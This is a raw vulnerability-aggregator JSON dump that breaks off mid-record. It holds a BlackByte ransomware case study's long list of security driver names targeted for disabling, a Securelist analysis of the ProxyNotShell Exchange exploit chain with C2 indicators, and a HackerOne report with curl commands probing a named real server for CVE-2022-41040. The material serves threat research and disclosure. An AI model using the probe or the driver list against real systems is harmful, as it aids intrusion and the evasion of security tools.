dgfilter.sys| dgsafe.sys| dhwatchdog.sys| diflt.sys \ndiskactmon.sys| dkdrv.sys| dkrtwrt.sys| dktlfsmf.sys| dnafsmonitor.sys \ndocvmonk.sys| docvmonk64.sys| dpmfilter.sys| drbdlock.sys| drivesentryfilterdriver2lite.sys \ndrsfile.sys| drvhookcsmf.sys| drvhookcsmf_amd64.sys| drwebfwflt.sys| drwebfwft.sys \ndsark.sys| dsdriver.sys| dsfemon.sys| dsflt.sys| dsfltfs.sys \ndskmn.sys| dtdsel.sys| dtpl.sys| dwprot.sys| dwshield.sys \ndwshield64.sys| eamonm.sys| easeflt.sys| easyanticheat.sys| eaw.sys \necatdriver.sys| edevmon.sys| ednemfsfilter.sys| edrdrv.sys| edrsensor.sys \nedsigk.sys| eectrl.sys| eetd32.sys| eetd64.sys| eeyehv.sys \neeyehv64.sys| egambit.sys| egfilterk.sys| egminflt.sys| egnfsflt.sys \nehdrv.sys| elock2fsctldriver.sys| emxdrv2.sys| enigmafilemondriver.sys| enmon.sys \nepdrv.sys| epfw.sys| epfwwfp.sys| epicfilter.sys| epklib.sys \nepp64.sys| epregflt.sys| eps.sys| epsmn.sys| equ8_helper.sys \neraser.sys| esensor.sys| esprobe.sys| estprmon.sys| estprp.sys \nestregmon.sys| estregp.sys| estrkmon.sys| estrkr.sys| eventmon.sys \nevmf.sys| evscase.sys| excfs.sys| exprevdriver.sys| failattach.sys \nfailmount.sys| fam.sys| fangcloud_autolock_driver.sys| fapmonitor.sys| farflt.sys \nfarwflt.sys| fasdriver| fcnotify.sys| fcontrol.sys| fdrtrace.sys \nfekern.sys| fencry.sys| ffcfilt.sys| ffdriver.sys| fildds.sys \nfilefilter.sys| fileflt.sys| fileguard.sys| filehubagent.sys| filemon.sys \nfilemonitor.sys| filenamevalidator.sys| filescan.sys| filesharemon.sys| filesightmf.sys \nfilesystemcbt.sys| filetrace.sys| file_monitor.sys| file_protector.sys| file_tracker.sys \nfilrdriver.sys| fim.sys| fiometer.sys| fiopolicyfilter.sys| fjgsdis2.sys \nfjseparettifilterredirect.sys| flashaccelfs.sys| flightrecorder.sys| fltrs329.sys| flyfs.sys \nfmdrive.sys| fmkkc.sys| fmm.sys| fortiaptfilter.sys| fortimon2.sys \nfortirmon.sys| fortishield.sys| fpav_rtp.sys| fpepflt.sys| fsafilter.sys \nfsatp.sys| fsfilter.sys| fsgk.sys| fshs.sys| fsmon.sys \nfsmonitor.sys| fsnk.sys| fsrfilter.sys| fstrace.sys| fsulgk.sys \nfsw31rj1.sys| gagsecurity.sys| gbpkm.sys| gcffilter.sys| gddcv.sys \ngefcmp.sys| gemma.sys| geprotection.sys| ggc.sys| gibepcore.sys \ngkff.sys| gkff64.sys| gkpfcb.sys| gkpfcb64.sys| gofsmf.sys \ngpminifilter.sys| groundling32.sys| groundling64.sys| gtkdrv.sys| gumhfilter.sys \ngzflt.sys| hafsnk.sys| hbflt.sys| hbfsfltr.sys| hcp_kernel_acq.sys \nhdcorrelatefdrv.sys| hdfilemon.sys| hdransomoffdrv.sys| hdrfs.sys| heimdall.sys \nhexisfsmonitor.sys| hfileflt.sys| hiofs.sys| hmpalert.sys| hookcentre.sys \nhooksys.sys| hpreg.sys| hsmltmon.sys| hsmltwhl.sys| hssfwhl.sys \nhvlminifilter.sys| ibr2fsk.sys| iccfileioad.sys| iccfilteraudit.sys| iccfiltersc.sys \nicfclientflt.sys| icrlmonitor.sys| iderafilterdriver.sys| ielcp.sys| ieslp.sys \nifs64.sys| ignis.sys| iguard.sys| iiscache.sys| ikfilesec.sys \nim.sys| imffilter.sys| imfilter.sys| imgguard.sys| immflex.sys \nimmunetprotect.sys| immunetselfprotect.sys| inisbdrv64.sys| ino_fltr.sys| intelcas.sys \nintmfs.sys| inuse.sys| invprotectdrv.sys| invprotectdrv64.sys| ionmonwdrv.sys \niothorfs.sys| ipcomfltr.sys| ipfilter.sys| iprotect.sys| iridiumswitch.sys \nirongatefd.sys| isafekrnl.sys| isafekrnlmon.sys| isafermon| isecureflt.sys \nisedrv.sys| isfpdrv.sys| isirmfmon.sys| isregflt.sys| isregflt64.sys \nissfltr.sys| issregistry.sys| it2drv.sys| it2reg.sys| ivappmon.sys \niwdmfs.sys| iwhlp.sys| iwhlp2.sys| iwhlpxp.sys| jdppsf.sys \njdppwf.sys| jkppob.sys| jkppok.sys| jkpppf.sys| jkppxk.sys \nk7sentry.sys| kavnsi.sys| kawachfsminifilter.sys| kc3.sys| kconv.sys \nkernelagent32.sys| kewf.sys| kfac.sys| kfileflt.sys| kisknl.sys \nklam.sys| klbg.sys| klboot.sys| kldback.sys| kldlinf.sys \nkldtool.sys| klfdefsf.sys| klflt.sys| klgse.sys| klhk.sys \nklif.sys| klifaa.sys| klifks.sys| klifsm.sys| klrsps.sys \nklsnsr.sys| klupd_klif_arkmon.sys| kmkuflt.sys| kmnwch.sys| kmxagent.sys \nkmxfile.sys| kmxsbx.sys| ksfsflt.sys| ktfsfilter.sys| ktsyncfsflt.sys \nkubwksp.sys| lafs.sys| lbd.sys| lbprotect.sys| lcgadmon.sys \nlcgfile.sys| lcgfilemon.sys| lcmadmon.sys| lcmfile.sys| lcmfilemon.sys \nlcmprintmon.sys| ldsecdrv.sys| libwamf.sys| livedrivefilter.sys| llfilter.sys \nlmdriver.sys| lnvscenter.sys| locksmith.sys| lragentmf.sys| lrtp.sys \nmagicbackupmonitor.sys| magicprotect.sys| majoradvapi.sys| marspy.sys| maxcryptmon.sys \nmaxproc64.sys| maxprotector.sys| mbae64.sys| mbam.sys| mbamchameleon.sys \nmbamshuriken.sys| mbamswissarmy.sys| mbamwatchdog.sys| mblmon.sys| mcfilemon32.sys \nmcfilemon64.sys| mcstrg.sys| mearwfltdriver.sys| message.sys| mfdriver.sys \nmfeaack.sys| mfeaskm.sys| mfeavfk.sys| mfeclnrk.sys| mfeelamk.sys \nmfefirek.sys| mfehidk.sys| mfencbdc.sys| mfencfilter.sys| mfencoas.sys \nmfencrk.sys| mfeplk.sys| mfewfpk.sys| miniicpt.sys| minispy.sys \nminitrc.sys| mlsaff.sys| mmpsy32.sys| mmpsy64.sys| monsterk.sys \nmozycorpfilter.sys| mozyenterprisefilter.sys| mozyentfilter.sys| mozyhomefilter.sys| mozynextfilter.sys \nmozyoemfilter.sys| mozyprofilter.sys| mpfilter.sys| mpkernel.sys| mpksldrv.sys \nmpxmon.sys| mracdrv.sys| mrxgoogle.sys| mscan-rt.sys| msiodrv4.sys \nmsixpackagingtoolmonitor.sys| msnfsflt.sys| mspy.sys| mssecflt.sys| mtsvcdf.sys \nmumdi.sys| mwac.sys| mwatcher.sys| mwfsmfltr.sys| mydlpmf.sys \nnamechanger.sys| nanoavmf.sys| naswsp.sys| ndgdmk.sys| neokerbyfilter \nnetaccctrl.sys| netaccctrl64.sys| netguard.sys| netpeeker.sys| ngscan.sys \nnlcbhelpi64.sys| nlcbhelpx64.sys| nlcbhelpx86.sys| nlxff.sys| nmlhssrv01.sys \nnmpfilter.sys| nntinfo.sys| novashield.sys| nowonmf.sys| npetw.sys \nnprosec.sys| npxgd.sys| npxgd64.sys| nravwka.sys| nrcomgrdka.sys \nnrcomgrdki.sys| nregsec.sys| nrpmonka.sys| nrpmonki.sys| nsminflt.sys \nnsminflt64.sys| ntest.sys| ntfsf.sys| ntguard.sys| ntps_fa.sys \nnullfilter.sys| nvcmflt.sys| nvmon.sys| nwedriver.sys| nxfsmon.sys \nnxrmflt.sys| oadevice.sys| oavfm.sys| oczminifilter.sys| odfsfilter.sys \nodfsfimfilter.sys| odfstokenfilter.sys| offsm.sys| omfltlh.sys| osiris.sys \nospfile_mini.sys| ospmon.sys| parity.sys| passthrough.sys| path8flt.sys \npavdrv.sys| pcpifd.sys| pctcore.sys| pctcore64.sys| pdgenfam.sys \npecfilter.sys| perfectworldanticheatsys.sys| pervac.sys| pfkrnl.sys| pfracdrv.sys \npgpfs.sys| pgpwdefs.sys| phantomd.sys| phdcbtdrv.sys| pkgfilter.sys \npkticpt.sys| plgfltr.sys| plpoffdrv.sys| pointguardvista64f.sys| pointguardvistaf.sys \npointguardvistar32.sys| pointguardvistar64.sys| procmon11.sys| proggerdriver.sys| psacfileaccessfilter.sys \npscff.sys| psgdflt.sys| psgfoctrl.sys| psinfile.sys| psinproc.sys \npsisolator.sys| pwipf6.sys| pwprotect.sys| pzdrvxp.sys| qdocumentref.sys \nqfapflt.sys| qfilter.sys| qfimdvr.sys| qfmon.sys| qminspec.sys \nqmon.sys| qqprotect.sys| qqprotectx64.sys| qqsysmon.sys| qqsysmonx64.sys \nqutmdrv.sys| ranpodfs.sys| ransomdefensexxx.sys| ransomdetect.sys| reaqtor.sys \nredlight.sys| regguard.sys| reghook.sys| regmonex.sys| repdrv.sys \nrepmon.sys| revefltmgr.sys| reveprocprotection.sys| revonetdriver.sys| rflog.sys \nrgnt.sys| rmdiskmon.sys| rmphvmonitor.sys| rpwatcher.sys| rrmon32.sys \nrrmon64.sys| rsfdrv.sys| rsflt.sys| rspcrtw.sys| rsrtw.sys \nrswctrl.sys| rswmon.sys| rtologon.sys| rtw.sys| ruaff.sys \nrubrikfileaudit.sys| ruidiskfs.sys| ruieye.sys| ruifileaccess.sys| ruimachine.sys \nruiminispy.sys| rvsavd.sys| rvsmon.sys| rw7fsflt.sys| rwchangedrv.sys \nryfilter.sys| ryguard.sys| safe-agent.sys| safsfilter.sys| sagntflt.sys \nsahara.sys| sakfile.sys| sakmfile.sys| samflt.sys| samsungrapidfsfltr.sys \nsanddriver.sys| santa.sys| sascan.sys| savant.sys| savonaccess.sys \nscaegis.sys| scauthfsflt.sys| scauthiodrv.sys| scensemon.sys| scfltr.sys \nscifsflt.sys| sciptflt.sys| sconnect.sys| scred.sys| sdactmon.sys \nsddrvldr.sys| sdvfilter.sys| se46filter.sys| secdodriver.sys| secone_filemon10.sys \nsecone_proc10.sys| secone_reg10.sys| secone_usb.sys| secrmm.sys| secufile.sys \nsecure_os.sys| secure_os_mf.sys| securofsd_x64.sys| sefo.sys| segf.sys \nsegiraflt.sys| segmd.sys| segmp.sys| sentinelmonitor.sys| serdr.sys \nserfs.sys| sfac.sys| sfavflt.sys| sfdfilter.sys| sfpmonitor.sys \nsgresflt.sys| shdlpmedia.sys| shdlpsf.sys| sheedantivirusfilterdriver.sys| sheedselfprotection.sys \nshldflt.sys| si32_file.sys| si64_file.sys| sieflt.sys| simrep.sys \nsisipsfilefilter| sk.sys| skyamdrv.sys| skyrgdrv.sys| skywpdrv.sys \nslb_guard.sys| sld.sys| smbresilfilter.sys| smdrvnt.sys| sndacs.sys \nsnexequota.sys| snilog.sys| snimg.sys| snscore.sys| snsrflt.sys \nsodatpfl.sys| softfilterxxx.sys| soidriver.sys| solitkm.sys| sonar.sys \nsophosdt2.sys| sophosed.sys| sophosntplwf.sys| sophossupport.sys| spbbcdrv.sys \nspellmon.sys| spider3g.sys| spiderg3.sys| spiminifilter.sys| spotlight.sys \nsprtdrv.sys| sqlsafefilterdriver.sys| srminifilterdrv.sys| srtsp.sys| srtsp64.sys \nsrtspit.sys| ssfmonm.sys| ssrfsf.sys| ssvhook.sys| stcvsm.sys \nstegoprotect.sys| stest.sys| stflt.sys| stkrnl64.sys| storagedrv.sys \nstrapvista.sys| strapvista64.sys| svcbt.sys| swcommfltr.sys| swfsfltr.sys \nswfsfltrv2.sys| swin.sys| symafr.sys| symefa.sys| symefa64.sys \nsymefasi.sys| symevent.sys| symevent64x86.sys| symevnt.sys| symevnt32.sys \nsymhsm.sys| symrg.sys| sysdiag.sys| sysmon.sys| sysmondrv.sys \nsysplant.sys| szardrv.sys| szdfmdrv.sys| szdfmdrv_usb.sys| szedrdrv.sys \nszpcmdrv.sys| taniumrecorderdrv.sys| taobserveflt.sys| tbfsfilt.sys| tbmninifilter.sys \ntbrdrv.sys| tdevflt.sys| tedrdrv.sys| tenrsafe2.sys| tesmon.sys \ntesxnginx.sys| tesxporter.sys| tffregnt.sys| tfsflt.sys| tgfsmf.sys \nthetta.sys| thfilter.sys| threatstackfim.sys| tkdac2k.sys| tkdacxp.sys \ntkdacxp64.sys| tkfsavxp.sys| tkfsavxp64.sys| tkfsft.sys| tkfsft64.sys \ntkpcftcb.sys| tkpcftcb64.sys| tkpl2k.sys| tkpl2k64.sys| tksp2k.sys \ntkspxp.sys| tkspxp64.sys| tmactmon.sys| tmcomm.sys| tmesflt.sys \ntmevtmgr.sys| tmeyes.sys| tmfsdrv2.sys| tmkmsnsr.sys| tmnciesc.sys \ntmpreflt.sys| tmumh.sys| tmums.sys| tmusa.sys| tmxpflt.sys \ntopdogfsfilt.sys| trace.sys| trfsfilter.sys| tritiumfltr.sys| trpmnflt.sys \ntrufos.sys| trustededgeffd.sys| tsifilemon.sys| tss.sys| tstfilter.sys \ntstfsredir.sys| tstregredir.sys| tsyscare.sys| tvdriver.sys| tvfiltr.sys \ntvmfltr.sys| tvptfile.sys| tvspfltr.sys| twbdcfilter.sys| txfilefilter.sys \ntxregmon.sys| uamflt.sys| ucafltdriver.sys| ufdfilter.sys| uncheater.sys \nupguardrealtime.sys| usbl_ifsfltr.sys| usbpdh.sys| usbtest.sys| uvmcifsf.sys \nuwfreg.sys| uwfs.sys| v3flt2k.sys| v3flu2k.sys| v3ift2k.sys \nv3iftmnt.sys| v3mifint.sys| varpffmon.sys| vast.sys| vcdriv.sys \nvchle.sys| vcmfilter.sys| vcreg.sys| veeamfct.sys| vfdrv.sys \nvfilefilter.sys| vfpd.sys| vfsenc.sys| vhddelta.sys| vhdtrack.sys \nvidderfs.sys| vintmfs.sys| virtfile.sys| virtualagent.sys| vk_fsf.sys \nvlflt.sys| vmwvvpfsd.sys| vollock.sys| vpdrvnt.sys| vradfil2.sys \nvraptdef.sys| vraptflt.sys| vrarnflt.sys| vrbbdflt.sys| vrexpdrv.sys \nvrfsftm.sys| vrfsftmx.sys| vrnsfilter.sys| vrsdam.sys| vrsdcore.sys \nvrsdetri.sys| vrsdetrix.sys| vrsdfmx.sys| vrvbrfsfilter.sys| vsepflt.sys \nvsscanner.sys| vtsysflt.sys| vxfsrep.sys| wats_se.sys| wbfilter.sys \nwcsdriver.sys| wdcfilter.sys| wdfilter.sys| wdocsafe.sys| wfp_mrt.sys \nwgfile.sys| whiteshield.sys| windbdrv.sys| windd.sys| winfladrv.sys \nwinflahdrv.sys| winfldrv.sys| winfpdrv.sys| winload.sys| winteonminifilter.sys \nwiper.sys| wlminisecmod.sys| wntgpdrv.sys| wraekernel.sys| wrcore.sys \nwrcore.x64.sys| wrdwizfileprot.sys| wrdwizregprot.sys| wrdwizscanner.sys| wrdwizsecure64.sys \nwrkrn.sys| wrpfv.sys| wsafefilter.sys| wscm.sys| xcpl.sys \nxendowflt.sys| xfsgk.sys| xhunter1.sys| xhunter64.sys| xiaobaifs.sys \nxiaobaifsr.sys| xkfsfd.sys| xoiv8x64.sys| xomfcbt8x64.sys| yahoostorage.sys \nyfsd.sys| yfsd2.sys| yfsdr.sys| yfsrd.sys| zampit_ml.sys \nzesfsmf.sys| zqfilter.sys| zsfprt.sys| zwasatom.sys| zwpxesvr.sys \nzxfsfilt.sys| zyfm.sys| zzpensys.sys| | \n \n## Further reading\n\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <https://aka.ms/threatintelblog>.\n\nTo get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>. \n\nThe post [The five-day job: A BlackByte ransomware intrusion case study](<https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T17:00:00", "type": "mmpc", "title": "The five-day job: A BlackByte ransomware intrusion case study", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16098", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2049-16098"], "modified": "2023-07-06T17:00:00", "id": "MMPC:0BCDCF68488C6A934B5C605C26DDC90F", "href": "https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2022-12-19T16:54:06", "description": "\n\n## Summary\n\nAt the end of September, GTSC reported an attack on critical infrastructure that took place in August. During the investigation, experts found that two 0-day vulnerabilities in Microsoft Exchange Server were used in the attack. The first one, later identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability that allows an authenticated attacker to remotely trigger the next vulnerability \u2013 CVE-2022-41082. The second vulnerability, in turn, allows remote code execution (RCE) when MS Exchange PowerShell is accessible to the attacker. As noted in the GTSC report, both vulnerabilities were exploited together in the wild to create a backdoor on a vulnerable server, and perform lateral movement.\n\nAfter CVE-2022-41040 and CVE-2022-41082 were revealed, Microsoft provided [mitigation guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) followed by a few updates. According to the company, the vulnerabilities affect MS Exchange Server 2013, MS Exchange Server 2016 and MS Exchange Server 2019.\n\nOn October 11, 2022, Microsoft released patches to cover these vulnerabilities as part of its Patch Tuesday update. After that, on November 17, a security researcher published the first working PoC. It was a Python script that accepts the following parameters: user, password, mail address and command line to be executed on the victim's host.\n\nThe cybersecurity community dubbed the pair of vulnerabilities **ProxyNotShell**. The name refers to a recent ProxyShell attack chain containing similar vulnerabilities in Exchange Servers that were disclosed in 2021. ProxyShell is a set of three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. Attackers used them to create web shells and execute arbitrary code on vulnerable Microsoft Exchange Servers.\n\n## ProxyNotShell exploitation details\n\nThe first step in this attack is exploiting **CVE-2022-41040** to get access to the PowerShell API endpoint. Using an insufficient filtering of input data in the Exchange **Autodiscover** mechanism, an attacker with a known login and password combination for a registered account, can gain access to the privileged endpoint of the Exchange Server API (**https://%_exchange server domain%_/powershell)**. This access allows the attacker to execute PowerShell commands in Exchange's environment on the server machine, passing them in the payload via the XML SOAP protocol.\n\nAt the next step, the attacker must get access to **Web-Based Enterprise Management (WBEM)** via the **WSMAN Protocol**. The attacker initiates the shell on the vulnerable system for further PowerShell script execution via **Windows Remote Management (PsRemoting)**.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083206/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_01.png>)\n\n**_HTTP POST request with XML SOAP to initiate PsRemoting_**\n\nAfter initiation of the shell, the attacker should immediately extend its lifetime; otherwise, the shell will be closed as its expiration time is too short by default. This is necessary for further command execution on Exchange Server. To do that the attacker immediately sends a special request via **WSMAN** that enables the **keep alive** option.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083245/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_02.png>)\n\n**_HTTP POST request with XML SOAP to extend the shell's lifetime_**\n\nAfter that, the attacker exploits a second vulnerability \u2013 **CVE-2022-41082**. By using PowerShell Remoting the attacker sends a request to create an address book, passing encoded and serialized data with a special payload as a parameter. In a published PoC, this encoded data contains a gadget called **System.UnitySerializationHolder** that spawns an object of the **System.Windows.Markup.XamlReader** class. This class processes XAML data from a payload, which creates a new object of the **System.Diagnostics** class and contains a method call to open a new process on the target system. In the published PoC, this process is **calc.exe**.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083322/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_03.png>)\n\n**_HTTP POST request with XML SOAP to start new process_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083400/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_04.png>)\n\n**_Main payload portion that executes the calc.exe process_**\n\n## ProxyNotShell post exploitation\n\nA few weeks later after the vulnerability was disclosed, Kaspersky detected a successful exploitation of **ProxyNotShell** in the wild. The actor performed the following actions:\n\n * Reconnaissance (users, groups, domains)\n * Various hijack attempts (even dropping vulnerable binaries)\n * Remote process injection\n * Persistence\n * Reverse shell\n\nIn this case, the attacker had the credentials to perform such an intrusion. They exploited the company's Exchange Server and as a result were able to create any process they wanted on the Exchange machine, passing commands as a payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19095522/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_05.png>)\n\nOn the server side all processes that are started via exploitation have a main parent process with certain parameters: **w3wp.exe -ap "msexchangepowershellapppool".**\n\nThese post-exploitation steps of the attack are very similar to the steps in the attack reported by [TrendMicro](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.trendmicro.com%2Fpl_pl%2Fresearch%2F22%2Fg%2Flog4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.html&data=05%7C01%7Cmapp%40microsoft.com%7C6ea0cb7fcd7d4d2ea92808dab12e25ff%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C638017110445189023%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000%7C%7C%7C&sdata=O5D%2B8%2BG%2F%2BthCuhizLONIBuphB6uNAL%2Fp%2BrWWkWfQGa0%3D&reserved=0>), with the only difference being the vulnerabilities that are exploited.\n\nOur products protect against all of these post exploitation steps as well as other attacks leveraging the **CVE-2022-41040** and **CVE-2022-41082** vulnerabilities. The detection name for **ProxyNotShell** is **PDM:Exploit.Win32.Generic**.\n\n## Our recommendations\n\nA few words of advice to those worried about possible exploitation of ProxyNotShell or other 0-day vulnerabilities:\n\n * Focus your defense strategy on detecting lateral movement and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections.\n * Use the latest [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) data to stay aware of actual TTPs used by threat actors.\n * Use a security solution with exploit prevention, vulnerability and patch management components, such as Kaspersky Endpoint Security for Business. Our [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) component monitors suspicious actions by applications and blocks the execution of malicious files.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) that identify and stop attacks in the early stages.\n\n## Indicators of compromise\n\nF77E55FD56FDAD21766CAA9C896734E9 | LockDown.dll | Malware hijack library | Trojan.Win64.Dllhijacker \n---|---|---|--- \nF9322EAD69300501356B13D751165DAA | mfeann.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \nA2FAE32F116870E5A94B5FAB50A1CB71 | Svchosts.exe | Malware reverse proxy | Trojan.Win64.Agent.qwibok \nHEUR:HackTool.Win64.Proxy.gen \n47A0814408210E6FCA502B3799B3952B | Glib-2.0.dll | Malware hijack library | Trojan.Win64.Dllhijacker \n379F87DAA6A23400ADF19C1CDD6B0DC9 | vmwarexferlogs.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \n193.149.185.52:443 | \u04212 server \nsync.service.auzreservices.com | \u04212 server", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-19T16:15:49", "type": "securelist", "title": "CVE-2022-41040 and CVE-2022-41082 \u2013 zero-days in MS Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-12-19T16:15:49", "id": "SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "href": "https://securelist.com/cve-2022-41040-and-cve-2022-41082-zero-days-in-ms-exchange/108364/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2023-08-25T13:21:05", "bounty": 1000.0, "description": "Hello Acronis team,\n\nPlease run\n\ncurl -ksL -m5 -o /dev/null -I -w \"%{http_code}\" \"https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/autodiscover.json@outlook.com&Protocol=ActiveSync\"\ncurl -ksL -m5 \"https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/autodiscover.json@outlook.com&Protocol=ActiveSync\" | grep Protocol\n\n\nand get following output\n\n404 and {\"Protocol\":\"ActiveSync\",\"Url\":\"https://eas.outlook.com/Microsoft-Server-ActiveSync\"}\n\nProving that mail.acronis.com is vulnerable to CVE-2022-41040\n\nPoc video attached\n\n## Impact\n\nSSRF can be used to for unauthorized actions or access to confidential data.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-02T08:47:22", "type": "hackerone", "title": "Acronis: mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-13T17:12:43", "id": "H1:1719719", "href": "https://hackerone.com/reports/1719719", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2023-02-03T11:16:36", "description": "# CVE-2022-41040-metasploit-ProxyNotShell\nthe metasploit script(...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-20T22:14:04", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2023-02-03T09:19:06", "id": "1FD14DF4-7723-5B40-A7BA-4E86B6E51603", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-09T05:17:47", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": 